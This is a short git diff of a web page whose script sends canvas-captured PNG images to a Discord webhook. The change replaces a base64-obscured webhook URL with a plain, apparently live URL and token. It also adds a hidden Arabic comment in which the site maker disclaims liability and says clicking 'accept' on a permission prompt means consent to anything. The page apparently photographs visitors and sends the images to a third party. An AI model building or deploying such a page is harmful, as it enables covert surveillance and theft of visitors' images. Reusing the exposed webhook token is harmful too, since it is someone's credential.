--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@ canvas.toBlob(blob => {
 const formData = new FormData();
 formData.append('file', blob, 'image.png');
 
-const webhookURL = 'aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM2MjgyNjkyMDg5NDM5ODM1NTUvcVlteC1SUDB2bWxkY3pTYW8xY2tFdGYxTUlRb1hXMSxoZ3FudHlmd1J5cjh2V2tWaUMlwbUbt1VaQ==';
+const webhookURL = 'https://discord.com/api/webhooks/1362846794458857572/-uovKrcHiDnprS1IWPLI1RSahCht_ypX_5BO8R9xEc5KZQ1XCrZSZ9uKt9VD3cbQmiXJ';
 
 fetch(webhookURL, {
 method: 'POST',
@@ -72,4 +72,5 @@ throw new Error('خطأ في إرسال الصورة');
 </script>
 </body>
 </html>
-
+<!--اخلاء المسوؤلية:
+رساله من صانع الموقع وهي انني اخلي مسوؤليتي من اي قضية تتم رفعها علي ووضعت هذا بالموقع ويمكن ل اي شخص رؤيته لو فعل inspect ثانيا الموقع يوجد به طلب اذن ويوجد خيارين اما رفض واما موافقه لو تم ضغط الموافقه ف المستخدم وافق على اي شيء سيحدث بعدها-->
